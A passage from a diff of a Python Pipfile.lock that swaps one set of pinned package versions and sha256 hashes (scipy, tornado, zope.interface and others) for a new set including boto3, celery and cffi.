"sha256:c48c909e92181a075ba358228a3fe161e26d205dad416ad81f27f23515a5626d", - "sha256:d6a6258f32c057a4e0478999c6ce43dcadaf8ea435f58ac601ae2768f93ef243" - ], - "index": "pypi", - "version": "==0.8.0" - }, - "s3transfer": { - "hashes": [ - "sha256:b014be3a8a2aab98cfe1abc7229cc5a9a0cf05eb9c1f2b86b230fd8df3f78084", - "sha256:cab66d3380cca3e70939ef2255d01cd8aece6a4907a9528740f668c4b0611861" - ], - "markers": "python_version >= '3.7'", - "version": "==0.6.2" - }, - "scipy": { - "hashes": [ - "sha256:08d957ca82d3535b3b9ba6c8ff355d78fe975271874e2af267cb5add5bd78625", - "sha256:249cfa465c379c9bb2c20123001e151ff5e29b351cbb7f9c91587260602c58d0", - "sha256:366a6a937110d80dca4f63b3f5b00cc89d36f678b2d124a01067b154e692bab1", - "sha256:39154437654260a52871dfde852adf1b93b1d1bc5dc0ffa70068f16ec0be2624", - "sha256:396fae3f8c12ad14c5f3eb40499fd06a6fef8393a6baa352a652ecd51e74e029", - "sha256:3b9963798df1d8a52db41a6fc0e6fa65b1c60e85d73da27ae8bb754de4792481", - "sha256:3e8eb42db36526b130dfbc417609498a6192381abc1975b91e3eb238e0b41c1a", - "sha256:512fdc18c65f76dadaca139348e525646d440220d8d05f6d21965b8d4466bccd", - "sha256:aec8c62fbe52914f9cf28d846cf0401dd80ab80788bbab909434eb336ed07c04", - "sha256:b41a0f322b4eb51b078cb3441e950ad661ede490c3aca66edef66f4b37ab1877", - "sha256:b4bb943010203465ac81efa392e4645265077b4d9e99b66cf3ed33ae12254173", - "sha256:b588311875c58d1acd4ef17c983b9f1ab5391755a47c3d70b6bd503a45bfaf71", - "sha256:ba94eeef3c9caa4cea7b402a35bb02a5714ee1ee77eb98aca1eed4543beb0f4c", - "sha256:be8c962a821957fdde8c4044efdab7a140c13294997a407eaee777acf63cbf0c", - "sha256:cce154372f0ebe88556ed06d7b196e9c2e0c13080ecb58d0f35062dc7cc28b47", - "sha256:d51565560565a0307ed06fa0ec4c6f21ff094947d4844d6068ed04400c72d0c3", - "sha256:e866514bc2d660608447b6ba95c8900d591f2865c07cca0aa4f7ff3c4ca70f30", - "sha256:fb5b492fa035334fd249f0973cc79ecad8b09c604b42a127a677b45a9a3d4289", - "sha256:ffb28e3fa31b9c376d0fb1f74c1f13911c8c154a760312fbee87a21eb21efe31" - ], - "markers": "python_version < '3.13' and python_version >= '3.9'", - "version": "==1.11.1" - }, - "setuptools": { - "hashes": [ - "sha256:d0b9a8433464d5800cbe05094acf5c6d52a91bfac9b52bcfc4d41382be5d5d31", - "sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f" - ], - "index": "pypi", - "version": "==65.5.1" - }, - "shortuuid": { - "hashes": [ - "sha256:27ea8f28b1bd0bf8f15057a3ece57275d2059d2b0bb02854f02189962c13b6aa", - "sha256:fc75f2615914815a8e4cb1501b3a513745cb66ef0fd5fc6fb9f8c3fa3481f789" - ], - "index": "pypi", - "version": "==1.0.11" - }, - "simhash": { - "hashes": [ - "sha256:49c5d81f31254f7e3f71dc2f5a245625c3d6143584478fdf4ffd2e63e4929366", - "sha256:533bc8cf41e4e6dd83f0b1847363516bf3323e0fa92e63d9e6df4e281e882e1b", - "sha256:634f41eb63d1c2dd1719459a859a985b2e0f2457670c9739c4d831a218409e8c", - "sha256:968de16c82c227a631aa00e57ab58f9e4ee9e47e8408486199a9eb59c1d6979b", - "sha256:a1dd9c4e2688fac260b5a810434326395bd23a566f5a8d5b9eac1336cc746d7f" - ], - "index": "pypi", - "version": "==2.1.2" - }, - "six": { - "hashes": [ - "sha256:30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259", - "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" - ], - "index": "pypi", - "version": "==1.15.0" - }, - "sqlparse": { - "hashes": [ - "sha256:5430a4fe2ac7d0f93e66f1efc6e1338a41884b7ddf2a350cedd20ccc4d9d28f3", - "sha256:d446183e84b8349fa3061f0fe7f06ca94ba65b426946ffebe6e3e8295332420c" - ], - "markers": "python_version >= '3.5'", - "version": "==0.4.4" - }, - "tablib": { - "extras": [ - "html", - "ods", - "xls", - "xlsx", - "yaml" - ], - "hashes": [ - "sha256:9821caa9eca6062ff7299fa645e737aecff982e6b2b42046928a6413c8dabfd9", - "sha256:f6661dfc45e1d4f51fa8a6239f9c8349380859a5bfaa73280645f046d6c96e33" - ], - "markers": "python_version >= '3.8'", - "version": "==3.5.0" - }, - "tomli": { - "hashes": [ - "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc", - "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f" - ], - "markers": "python_version >= '3.7'", - "version": "==2.0.1" - }, - "tornado": { - "hashes": [ - "sha256:1bd19ca6c16882e4d37368e0152f99c099bad93e0950ce55e71daed74045908f", - "sha256:22d3c2fa10b5793da13c807e6fc38ff49a4f6e1e3868b0a6f4164768bb8e20f5", - "sha256:502fba735c84450974fec147340016ad928d29f1e91f49be168c0a4c18181e1d", - "sha256:65ceca9500383fbdf33a98c0087cb975b2ef3bfb874cb35b8de8740cf7f41bd3", - "sha256:71a8db65160a3c55d61839b7302a9a400074c9c753040455494e2af74e2501f2", - "sha256:7ac51f42808cca9b3613f51ffe2a965c8525cb1b00b7b2d56828b8045354f76a", - "sha256:7d01abc57ea0dbb51ddfed477dfe22719d376119844e33c661d873bf9c0e4a16", - "sha256:805d507b1f588320c26f7f097108eb4023bbaa984d63176d1652e184ba24270a", - "sha256:9dc4444c0defcd3929d5c1eb5706cbe1b116e762ff3e0deca8b715d14bf6ec17", - "sha256:ceb917a50cd35882b57600709dd5421a418c29ddc852da8bcdab1f0db33406b0", - "sha256:e7d8db41c0181c80d76c982aacc442c0783a2c54d6400fe028954201a2e032fe" - ], - "markers": "python_version >= '3.8'", - "version": "==6.3.3" - }, - "types-awscrt": { - "hashes": [ - "sha256:0e31d7ba44e1898af37d224b94d28ffaef19baf89bb18ea2599de9ac0910a07f", - "sha256:eaef60422cf716b4ae216f164b74d679c82b0d9c53db380a37deb29ae5579b1b" - ], - "markers": "python_version >= '3.7' and python_version < '4.0'", - "version": "==0.19.0" - }, - "types-pymysql": { - "hashes": [ - "sha256:cbd0c123a8116f7b99970a7c663399bb3b4bb9d97b8f843909c5cc27abea064f", - "sha256:e350c8920455eb5cb3f8a65fd95a1350340e396f6f1451f0fe1d035240929969" - ], - "index": "pypi", - "version": "==1.1.0.0" - }, - "types-pyopenssl": { - "hashes": [ - "sha256:19536aa3debfbe25a918cf0d898e9f5fbbe6f3594a429da7914bf331deb1b342", - "sha256:6a010dac9ecd42b582d7dd2cc3e9e40486b79b3b64bb2fffba1474ff96af906d" - ], - "version": "==23.2.0.2" - }, - "types-python-dateutil": { - "hashes": [ - "sha256:09a0275f95ee31ce68196710ed2c3d1b9dc42e0b61cc43acc369a42cb939134f", - "sha256:0b0e7c68e7043b0354b26a1e0225cb1baea7abb1b324d02b50e2d08f1221043f" - ], - "index": "pypi", - "version": "==2.8.19.13" - }, - "types-pytz": { - "hashes": [ - "sha256:1a7b8d4aac70981cfa24478a41eadfcd96a087c986d6f150d77e3ceb3c2bdfab", - "sha256:65152e872137926bb67a8fe6cc9cfd794365df86650c5d5fdc7b167b0f38892e" - ], - "version": "==2023.3.0.1" - }, - "types-pyyaml": { - "hashes": [ - "sha256:662fa444963eff9b68120d70cda1af5a5f2aa57900003c2006d7626450eaae5f", - "sha256:ebab3d0700b946553724ae6ca636ea932c1b0868701d4af121630e78d695fc97" - ], - "index": "pypi", - "version": "==6.0.12.10" - }, - "types-redis": { - "hashes": [ - "sha256:a98f3386f44d045057696f3efc8869c53dda0060610e0fe3d8a4d391e2a8916a", - "sha256:d0efcd96f65fd2036437c29d8c12566cfdc549345d73eddacb0488b81aff9f9e" - ], - "index": "pypi", - "version": "==4.6.0.2" - }, - "types-requests": { - "hashes": [ - "sha256:3de667cffa123ce698591de0ad7db034a5317457a596eb0b4944e5a9d9e8d1ac", - "sha256:afb06ef8f25ba83d59a1d424bd7a5a939082f94b94e90ab5e6116bd2559deaa3" - ], - "index": "pypi", - "version": "==2.31.0.1" - }, - "types-s3transfer": { - "hashes": [ - "sha256:1068877b6e59be5226fa3006ae64371ac9d5bc590dfdbd9c66fd0a075d3254ac", - "sha256:4ba9b483796fdcd026aa162ee03bdcedd2bf7d08e9387c820dcdd158b0102057" - ], - "markers": "python_version >= '3.7' and python_version < '4.0'", - "version": "==0.6.2" - }, - "types-urllib3": { - "hashes": [ - "sha256:3300538c9dc11dad32eae4827ac313f5d986b8b21494801f1bf97a1ac6c03ae5", - "sha256:5dbd1d2bef14efee43f5318b5d36d805a489f6600252bb53626d4bfafd95e27c" - ], - "index": "pypi", - "version": "==1.26.25.13" - }, - "typing-extensions": { - "hashes": [ - "sha256:440d5dd3af93b060174bf433bccd69b0babc3b15b1a8dca43789fd7f61514b36", - "sha256:b75ddc264f0ba5615db7ba217daeb99701ad295353c45f9e95963337ceeeffb2" - ], - "index": "pypi", - "version": "==4.7.1" - }, - "typing-inspect": { - "hashes": [ - "sha256:9ee6fc59062311ef8547596ab6b955e1b8aa46242d854bfc78f4f6b0eff35f9f", - "sha256:b23fc42ff6f6ef6954e4852c1fb512cdd18dbea03134f91f856a95ccc9461f78" - ], - "version": "==0.9.0" - }, - "tzdata": { - "hashes": [ - "sha256:11ef1e08e54acb0d4f95bdb1be05da659673de4acbd21bf9c69e94cc5e907a3a", - "sha256:7e65763eef3120314099b6939b5546db7adce1e7d6f2e179e3df563c70511eda" - ], - "markers": "python_version >= '2'", - "version": "==2023.3" - }, - "uritemplate": { - "hashes": [ - "sha256:4346edfc5c3b79f694bccd6d6099a322bbeb628dbf2cd86eea55a456ce5124f0", - "sha256:830c08b8d99bdd312ea4ead05994a38e8936266f84b9a7878232db50b044e02e" - ], - "markers": "python_version >= '3.6'", - "version": "==4.1.1" - }, - "urllib3": { - "hashes": [ - "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c", - "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" - ], - "index": "pypi", - "version": "==1.26.5" - }, - "uwsgi": { - "hashes": [ - "sha256:35a30d83791329429bc04fe44183ce4ab512fcf6968070a7bfba42fc5a0552a9" - ], - "index": "pypi", - "version": "==2.0.21" - }, - "uwsgitop": { - "hashes": [ - "sha256:99ca245119e4a0600840a62b7b4e020c9870fe90952b24eecfff0c9090c75d14" - ], - "index": "pypi", - "version": "==0.11" - }, - "vine": { - "hashes": [ - "sha256:4c9dceab6f76ed92105027c49c823800dd33cacce13bdedc5b914e3514b7fb30", - "sha256:7d3b1624a953da82ef63462013bbd271d3eb75751489f9807598e8f340bd637e" - ], - "markers": "python_version >= '3.6'", - "version": "==5.0.0" - }, - "wcwidth": { - "hashes": [ - "sha256:795b138f6875577cd91bba52baf9e445cd5118fd32723b460e30a0af30ea230e", - "sha256:a5220780a404dbe3353789870978e472cfe477761f06ee55077256e509b156d0" - ], - "version": "==0.2.6" - }, - "xlrd": { - "hashes": [ - "sha256:6a33ee89877bd9abc1158129f6e94be74e2679636b8a205b43b85206c3f0bbdd", - "sha256:f72f148f54442c6b056bf931dbc34f986fd0c3b0b6b5a58d013c9aef274d0c88" - ], - "version": "==2.0.1" - }, - "xlwt": { - "hashes": [ - "sha256:a082260524678ba48a297d922cc385f58278b8aa68741596a87de01a9c628b2e", - "sha256:c59912717a9b28f1a3c2a98fd60741014b06b043936dcecbc113eaaada156c88" - ], - "index": "pypi", - "version": "==1.3.0" - }, - "zope.event": { - "hashes": [ - "sha256:2832e95014f4db26c47a13fdaef84cef2f4df37e66b59d8f1f4a8f319a632c26", - "sha256:bac440d8d9891b4068e2b5a2c5e2c9765a9df762944bda6955f96bb9b91e67cd" - ], - "markers": "python_version >= '3.7'", - "version": "==5.0" - }, - "zope.interface": { - "hashes": [ - "sha256:042f2381118b093714081fd82c98e3b189b68db38ee7d35b63c327c470ef8373", - "sha256:0ec9653825f837fbddc4e4b603d90269b501486c11800d7c761eee7ce46d1bbb", - "sha256:12175ca6b4db7621aedd7c30aa7cfa0a2d65ea3a0105393e05482d7a2d367446", - "sha256:1592f68ae11e557b9ff2bc96ac8fc30b187e77c45a3c9cd876e3368c53dc5ba8", - "sha256:23ac41d52fd15dd8be77e3257bc51bbb82469cf7f5e9a30b75e903e21439d16c", - "sha256:424d23b97fa1542d7be882eae0c0fc3d6827784105264a8169a26ce16db260d8", - "sha256:4407b1435572e3e1610797c9203ad2753666c62883b921318c5403fb7139dec2", - "sha256:48f4d38cf4b462e75fac78b6f11ad47b06b1c568eb59896db5b6ec1094eb467f", - "sha256:4c3d7dfd897a588ec27e391edbe3dd320a03684457470415870254e714126b1f", - "sha256:5171eb073474a5038321409a630904fd61f12dd1856dd7e9d19cd6fe092cbbc5", - "sha256:5a158846d0fca0a908c1afb281ddba88744d403f2550dc34405c3691769cdd85", - "sha256:6ee934f023f875ec2cfd2b05a937bd817efcc6c4c3f55c5778cbf78e58362ddc", - "sha256:790c1d9d8f9c92819c31ea660cd43c3d5451df1df61e2e814a6f99cebb292788", - "sha256:809fe3bf1a91393abc7e92d607976bbb8586512913a79f2bf7d7ec15bd8ea518", - "sha256:87b690bbee9876163210fd3f500ee59f5803e4a6607d1b1238833b8885ebd410", - "sha256:89086c9d3490a0f265a3c4b794037a84541ff5ffa28bb9c24cc9f66566968464", - "sha256:99856d6c98a326abbcc2363827e16bd6044f70f2ef42f453c0bd5440c4ce24e5", - "sha256:aab584725afd10c710b8f1e6e208dbee2d0ad009f57d674cb9d1b3964037275d", - "sha256:af169ba897692e9cd984a81cb0f02e46dacdc07d6cf9fd5c91e81f8efaf93d52", - "sha256:b39b8711578dcfd45fc0140993403b8a81e879ec25d53189f3faa1f006087dca", - "sha256:b3f543ae9d3408549a9900720f18c0194ac0fe810cecda2a584fd4dca2eb3bb8", - "sha256:d0583b75f2e70ec93f100931660328965bb9ff65ae54695fb3fa0a1255daa6f2", - "sha256:dfbbbf0809a3606046a41f8561c3eada9db811be94138f42d9135a5c47e75f6f", - "sha256:e538f2d4a6ffb6edfb303ce70ae7e88629ac6e5581870e66c306d9ad7b564a58", - "sha256:eba51599370c87088d8882ab74f637de0c4f04a6d08a312dce49368ba9ed5c2a", - "sha256:ee4b43f35f5dc15e1fec55ccb53c130adb1d11e8ad8263d68b1284b66a04190d", - "sha256:f2363e5fd81afb650085c6686f2ee3706975c54f331b426800b53531191fdf28", - "sha256:f299c020c6679cb389814a3b81200fe55d428012c5e76da7e722491f5d205990", - "sha256:f72f23bab1848edb7472309e9898603141644faec9fd57a823ea6b4d1c4c8995", - "sha256:fa90bac61c9dc3e1a563e5babb3fd2c0c1c80567e815442ddbe561eadc803b30" - ], - "markers": "python_version >= '3.7'", - "version": "==6.0" - } - }, - "develop": {} + "_meta": { + "hash": { + "sha256": "8bce8867d66a1ba873c5ea667cbd41bff03a2e8599e9737e3ad120007d06b0f6" + }, + "pipfile-spec": 6, + "requires": { + "python_version": "3.10" + }, + "sources": [ + { + "name": "pypi", + "url": "https://pypi.org/simple", + "verify_ssl": true + } + ] + }, + "default": { + "aliyun-python-sdk-core": { + "hashes": [ + "sha256:20bd54984fa316da700c7f355a51ab0b816690e2a0fcefb7b5ef013fed0da928" + ], + "version": "==2.13.36" + }, + "aliyun-python-sdk-core-v3": { + "hashes": [ + "sha256:d7df820fa31193be3f0a3a991c4126051900b3d2f09c0fc5ff7af43cf36ac245" + ], + "version": "==2.13.33" + }, + "aliyun-python-sdk-kms": { + "hashes": [ + "sha256:9bc39c693ba83944f5dfb871b118a2925eb8a5ee214dfcce61ee2ea3b6317ef1", + "sha256:a372737715682014bace68bd40fe83332f4fd925009a3eb110d41bc66f270e7a" + ], + "version": "==2.16.1" + }, + "amqp": { + "hashes": [ + "sha256:2c1b13fecc0893e946c65cbd5f36427861cffa4ea2201d8f6fca22e2a373b5e2", + "sha256:6f0956d2c23d8fa6e7691934d8c3930eadb44972cbbd1a7ae3a520f735d43359" + ], + "markers": "python_version >= '3.6'", + "version": "==5.1.1" + }, + "asgiref": { + "hashes": [ + "sha256:89b2ef2247e3b562a16eef663bc0e2e703ec6468e2fa8a5cd61cd449786d4f6e", + "sha256:9e0ce3aa93a819ba5b45120216b23878cf6e8525eb3848653452b4192b92afed" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==3.7.2" + }, + "async-timeout": { + "hashes": [ + "sha256:4640d96be84d82d02ed59ea2b7105a0f7b33abe8703703cd0ab0bf87c427522f", + "sha256:7405140ff1230c310e51dc27b3145b9092d659ce68ff733fb0cefe3ee42be028" + ], + "markers": "python_version >= '3.7'", + "version": "==4.0.3" + }, + "attrs": { + "hashes": [ + "sha256:1f28b4522cdc2fb4256ac1a020c78acf9cba2c6b461ccd2c126f3aa8e8335d04", + "sha256:6279836d581513a26f1bf235f9acd333bc9115683f14f7e8fae46c98fc50e015" + ], + "markers": "python_version >= '3.7'", + "version": "==23.1.0" + }, + "autopep8": { + "hashes": [ + "sha256:067959ca4a07b24dbd5345efa8325f5f58da4298dab0dde0443d5ed765de80cb", + "sha256:2913064abd97b3419d1cc83ea71f042cb821f87e45b9c88cad5ad3c4ea87fe0c" + ], + "markers": "python_version >= '3.6'", + "version": "==2.0.4" + }, + "billiard": { + "hashes": [ + "sha256:0f50d6be051c6b2b75bfbc8bfd85af195c5739c281d3f5b86a5640c65563614a", + "sha256:1ad2eeae8e28053d729ba3373d34d9d6e210f6e4d8bf0a9c64f92bd053f1edf5" + ], + "markers": "python_version >= '3.7'", + "version": "==4.1.0" + }, + "boto3": { + "hashes": [ + "sha256:34ab44146a2c4e7f4e72737f4b27e6eb5e0a7855c2f4599e3d9199b6a0a2d575", + "sha256:a50b4323f9579cfe22fcf5531fbd40b567d4d74c1adce06aeb5c95fce2a6fb40" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==1.24.59" + }, + "boto3-stubs": { + "hashes": [ + "sha256:68c9c5b88982aea2023225815cf4aef8ec8deeecce9b6225d2d71cfad2247a10", + "sha256:7fca135b829888dea640b13d1ba508e3b2c0c31135ca8b07a11dda0247067d37" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==1.28.35" + }, + "botocore": { + "hashes": [ + "sha256:1d6e97bd8653f732c7078b34aa2bb438e750898957e5a0a74b6c72918bc1d0f7", + "sha256:c8fac203a391cc2e4b682877bfce70e723e33c529b35b399a1d574605fbeb1af" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==1.27.91" + }, + "botocore-stubs": { + "hashes": [ + "sha256:19cf4813f717ebf112eeb8908c61385bce44163d5e827cc3debe5a6b63f4ef04", + "sha256:96858fb8bcf1f4413629b1f9484588e5d6bf3f9c20a37b2e760edf94f4b64c00" + ], + "index": "pypi", + "markers": "python_version >= '3.7' and python_version < '4.0'", + "version": "==1.31.35" + }, + "celery": { + "hashes": [ + "sha256:0f104775617974c9a108857c883dd5a5b0a9058278bccf1881ff5d3317fa15ab", + "sha256:3afa81e7c6393097a4079badc11117ac20a1bf145c92ae5f1cc3ed24c2b1f165" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==5.3.0rc1" + }, + "celery-singleton": { + "hashes": [ + "sha256:260ce4978e631f8682ea0ccb03d7f3b87d42bc20e04e9bd46ddb78a2f8035d1e", + "sha256:76b30a1bbe31d42030924b3eecfcaae2ab3ab99bf43e607cd46437f012434420" + ], + "index": "pypi", + "markers": "python_version >= '3.6' and python_version < '4.0'", + "version": "==0.3.1" + }, + "certifi": { + "hashes": [ + "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082", + "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9" + ], + "index": "pypi", + "markers": "python_version >= '3.6'", + "version": "==2023.7.22" + }, + "cffi": { + "hashes": [ + "sha256:00a9ed42e88df81ffae7a8ab6d9356b371399b91dbdf0c3cb1e84c03a13aceb5", + "sha256:03425bdae262c76aad70202debd780501fabeaca237cdfddc008987c0e0f59ef", + "sha256:04ed324bda3cda42b9b695d51bb7d54b680b9719cfab04227cdd1e04e5de3104", + "sha256:0e2642fe3142e4cc4af0799748233ad6da94c62a8bec3a6648bf8ee68b1c7426", + "sha256:173379135477dc8cac4bc58f45db08ab45d228b3363adb7af79436135d028405", + "sha256:198caafb44239b60e252492445da556afafc7d1e3ab7a1fb3f0584ef6d742375", + "sha256:1e74c6b51a9ed6589199c787bf5f9875612ca4a8a0785fb2d4a84429badaf22a", + "sha256:2012c72d854c2d03e45d06ae57f40d78e5770d252f195b93f581acf3ba44496e", + "sha256:21157295583fe8943475029ed5abdcf71eb3911894724e360acff1d61c1d54bc", + "sha256:2470043b93ff09bf8fb1d46d1cb756ce6132c54826661a32d4e4d132e1977adf", + "sha256:285d29981935eb726a4399badae8f0ffdff4f5050eaa6d0cfc3f64b857b77185", + "sha256:30d78fbc8ebf9c92c9b7823ee18eb92f2e6ef79b45ac84db507f52fbe3ec4497", + "sha256:320dab6e7cb2eacdf0e658569d2575c4dad258c0fcc794f46215e1e39f90f2c3", + "sha256:33ab79603146aace82c2427da5ca6e58f2b3f2fb5da893ceac0c42218a40be35", + "sha256:3548db281cd7d2561c9ad9984681c95f7b0e38881201e157833a2342c30d5e8c", + "sha256:3799aecf2e17cf585d977b780ce79ff0dc9b78d799fc694221ce814c2c19db83", + "sha256:39d39875251ca8f612b6f33e6b1195af86d1b3e60086068be9cc053aa4376e21", + "sha256:3b926aa83d1edb5aa5b427b4053dc420ec295a08e40911296b9eb1b6170f6cca", + "sha256:3bcde07039e586f91b45c88f8583ea7cf7a0770df3a1649627bf598332cb6984", + "sha256:3d08afd128ddaa624a48cf2b859afef385b720bb4b43df214f85616922e6a5ac", + "sha256:3eb6971dcff08619f8d91607cfc726518b6fa2a9eba42856be181c6d0d9515fd", + "sha256:40f4774f5a9d4f5e344f31a32b5096977b5d48560c5592e2f3d2c4374bd543ee", + "sha256:4289fc34b2f5316fbb762d75362931e351941fa95fa18789191b33fc4cf9504a", + "sha256:470c103ae716238bbe698d67ad020e1db9d9dba34fa5a899b5e21577e6d52ed2", + "sha256:4f2c9f67e9821cad2e5f480bc8d83b8742896f1242dba247911072d4fa94c192", + "sha256:50a74364d85fd319352182ef59c5c790484a336f6db772c1a9231f1c3ed0cbd7", + "sha256:54a2db7b78338edd780e7ef7f9f6c442500fb0d41a5a4ea24fff1c929d5af585", + "sha256:5635bd9cb9731e6d4a1132a498dd34f764034a8ce60cef4f5319c0541159392f", + "sha256:59c0b02d0a6c384d453fece7566d1c7e6b7bae4fc5874ef2ef46d56776d61c9e", + "sha256:5d598b938678ebf3c67377cdd45e09d431369c3b1a5b331058c338e201f12b27", + "sha256:5df2768244d19ab7f60546d0c7c63ce1581f7af8b5de3eb3004b9b6fc8a9f84b", + "sha256:5ef34d190326c3b1f822a5b7a45f6c4535e2f47ed06fec77d3d799c450b2651e", + "sha256:6975a3fac6bc83c4a65c9f9fcab9e47019a11d3d2cf7f3c0d03431bf145a941e", + "sha256:6c9a799e985904922a4d207a94eae35c78ebae90e128f0c4e521ce339396be9d", + "sha256:70df4e3b545a17496c9b3f41f5115e69a4f2e77e94e1d2a8e1070bc0c38c8a3c", + "sha256:7473e861101c9e72452f9bf8acb984947aa1661a7704553a9f6e4baa5ba64415", + "sha256:8102eaf27e1e448db915d08afa8b41d6c7ca7a04b7d73af6514df10a3e74bd82", + "sha256:87c450779d0914f2861b8526e035c5e6da0a3199d8f1add1a665e1cbc6fc6d02", + "sha256:8b7ee99e510d7b66cdb6c593f21c043c248537a32e0bedf02e01e9553a172314", + "sha256:91fc98adde3d7881af9b59ed0294046f3806221863722ba7d8d120c575314325", + "sha256:94411f22c3985acaec6f83c6df553f2dbe17b698cc7f8ae751ff2237d96b9e3c", + "sha256:98d85c6a2bef81588d9227dde12db8a7f47f639f4a17c9ae08e773aa9c697bf3", + "sha256:9ad5db27f9cabae298d151c85cf2bad1d359a1b9c686a275df03385758e2f914", + "sha256:a0b71b1b8fbf2b96e41c4d990244165e2c9be83d54962a9a1d118fd8657d2045", + "sha256:a0f100c8912c114ff53e1202d0078b425bee3649ae34d7b070e9697f93c5d52d", + "sha256:a591fe9e525846e4d154205572a029f653ada1a78b93697f3b5a8f1f2bc055b9", + "sha256:a5c84c68147988265e60416b57fc83425a78058853509c1b0629c180094904a5", + "sha256:a66d3508133af6e8548451b25058d5812812ec3798c886bf38ed24a98216fab2", + "sha256:a8c4917bd7ad33e8eb21e9a5bbba979b49d9a97acb3a803092cbc1133e20343c", + "sha256:b3bbeb01c2b273cca1e1e0c5df57f12dce9a4dd331b4fa1635b8bec26350bde3", + "sha256:cba9d6b9a7d64d4bd46167096fc9d2f835e25d7e4c121fb2ddfc6528fb0413b2", + "sha256:cc4d65aeeaa04136a12677d3dd0b1c0c94dc43abac5860ab33cceb42b801c1e8", + "sha256:ce4bcc037df4fc5e3d184794f27bdaab018943698f4ca31630bc7f84a7b69c6d", + "sha256:cec7d9412a9102bdc577382c3929b337320c4c4c4849f2c5cdd14d7368c5562d", + "sha256:d400bfb9a37b1351253cb402671cea7e89bdecc294e8016a707f6d1d8ac934f9", + "sha256:d61f4695e6c866a23a21acab0509af1cdfd2c013cf256bbf5b6b5e2695827162", + "sha256:db0fbb9c62743ce59a9ff687eb5f4afbe77e5e8403d6697f7446e5f609976f76", + "sha256:dd86c085fae2efd48ac91dd7ccffcfc0571387fe1193d33b6394db7ef31fe2a4", + "sha256:e00b098126fd45523dd056d2efba6c5a63b71ffe9f2bbe1a4fe1716e1d0c331e", + "sha256:e229a521186c75c8ad9490854fd8bbdd9a0c9aa3a524326b55be83b54d4e0ad9", + "sha256:e263d77ee3dd201c3a142934a086a4450861778baaeeb45db4591ef65550b0a6", + "sha256:ed9cb427ba5504c1dc15ede7d516b84757c3e3d7868ccc85121d9310d27eed0b", + "sha256:fa6693661a4c91757f4412306191b6dc88c1703f780c8234035eac011922bc01", + "sha256:fcd131dd944808b5bdb38e6f5b53013c5aa4f334c5cad0c72742f6eba4b73db0" + ], + "index": "pypi", + "version": "==1.15.1" + }, + "chardet": { + "hashes": [ + "sha256:1b3b6ff479a8c414bc3fa2c0852995695c4a026dcd6d0633b2dd092ca39c1cf7", + "sha256:e1cf59446890a00105fe7b7912492ea04b6e6f06d4b742b2c788469e34c82970" + ], + "index": "pypi", + "markers": "python_version >= '3.7'", + "version": "==5.2.0" + }, + "charset-normalizer": { + "hashes": [ + "sha256:04e57ab9fbf9607b77f7d057974694b4f6b142da9ed4a199859d9d4d5c63fe96", + "sha256:09393e1b2a9461950b1c9a45d5fd251dc7c6f228acab64da1c9c0165d9c7765c", + "sha256:0b87549028f680ca955556e3bd57013ab47474c3124dc069faa0b6545b6c9710", + "sha256:1000fba1057b92a65daec275aec30586c3de2401ccdcd41f8a5c1e2c87078706", + "sha256:1249cbbf3d3b04902ff081ffbb33ce3377fa6e4c7356f759f3cd076cc138d020", + "sha256:1920d4ff15ce893210c1f0c0e9d19bfbecb7983c76b33f046c13a8ffbd570252", + "sha256:193cbc708ea3aca45e7221ae58f0fd63f933753a9bfb498a3b474878f12caaad", + "sha256:1a100c6d595a7f316f1b6f01d20815d916e75ff98c27a01ae817439ea7726329", + "sha256:1f30b48dd7fa1474554b0b0f3fdfdd4c13b5c737a3c6284d3cdc424ec0ffff3a", + "sha256:203f0c8871d5a7987be20c72442488a0b8cfd0f43b7973771640fc593f56321f", + "sha256:246de67b99b6851627d945db38147d1b209a899311b1305dd84916f2b88526c6", + "sha256:2dee8e57f052ef5353cf608e0b4c871aee320dd1b87d351c28764fc0ca55f9f4", + "sha256:2efb1bd13885392adfda4614c33d3b68dee4921fd0ac1d3988f8cbb7d589e72a", + "sha256:2f4ac36d8e2b4cc1aa71df3dd84ff8efbe3bfb97ac41242fbcfc053c67434f46", + "sha256:3170c9399da12c9dc66366e9d14da8bf7147e1e9d9ea566067bbce7bb74bd9c2", + "sha256:3b1613dd5aee995ec6d4c69f00378bbd07614702a315a2cf6c1d21461fe17c23", + "sha256:3bb3d25a8e6c0aedd251753a79ae98a093c7e7b471faa3aa9a93a81431987ace", + "sha256:3bb7fda7260735efe66d5107fb7e6af6a7c04c7fce9b2514e04b7a74b06bf5dd", + "sha256:41b25eaa7d15909cf3ac4c96088c1f266a9a93ec44f87f1d13d4a0e86c81b982", + "sha256:45de3f87179c1823e6d9e32156fb14c1927fcc9aba21433f088fdfb555b77c10", + "sha256:46fb8c61d794b78ec7134a715a3e564aafc8f6b5e338417cb19fe9f57a5a9bf2", + "sha256:48021783bdf96e3d6de03a6e39a1171ed5bd7e8bb93fc84cc649d11490f87cea", + "sha256:4957669ef390f0e6719db3613ab3a7631e68424604a7b448f079bee145da6e09", + "sha256:5e86d77b090dbddbe78867a0275cb4df08ea195e660f1f7f13435a4649e954e5", + "sha256:6339d047dab2780cc6220f46306628e04d9750f02f983ddb37439ca47ced7149", + "sha256:681eb3d7e02e3c3655d1b16059fbfb605ac464c834a0c629048a30fad2b27489", + "sha256:6c409c0deba34f147f77efaa67b8e4bb83d2f11c8806405f76397ae5b8c0d1c9", + "sha256:7095f6fbfaa55defb6b733cfeb14efaae7a29f0b59d8cf213be4e7ca0b857b80", + "sha256:70c610f6cbe4b9fce272c407dd9d07e33e6bf7b4aa1b7ffb6f6ded8e634e3592", + "sha256:72814c01533f51d68702802d74f77ea026b5ec52793c791e2da806a3844a46c3", + 